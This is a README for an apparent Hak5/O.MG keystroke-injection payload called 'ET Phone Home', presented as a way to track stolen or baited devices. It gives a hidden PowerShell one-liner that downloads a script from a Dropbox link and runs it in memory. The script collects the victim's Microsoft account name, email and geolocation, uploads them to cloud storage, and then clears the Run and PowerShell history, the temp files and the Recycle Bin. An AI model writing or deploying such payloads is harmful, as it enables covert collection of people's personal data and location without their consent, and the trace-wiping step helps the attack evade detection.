a0b89f3d3c | ||
---|---|---|
.. | ||
ET-Phone-Home-Execute.txt | ||
ET-Phone-Home.ps1 | ||
README.md |
README.md
Table of Contents
ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
Description
This program is meant to locate your devices. Save the execution file on the boot partition of your devices and when someone plugs it into their computer Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox. Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
Getting Started
Dependencies
- DropBox - Your Shared link for the intended file
- Windows 7,10,11
Executing program
- Your device is plugged into the targets computer
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory if your intended wifi network is not detected with the geofencing options
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
Something Like What you see below will be in your cloud storage:
NAME
LATITUDE AND LONGITUDE
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
Contributing
All contributors names will be listed here
I am Jakoby
Kalani
Version History
- 0.1
- Initial Release
Contact
I am Jakoby
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home)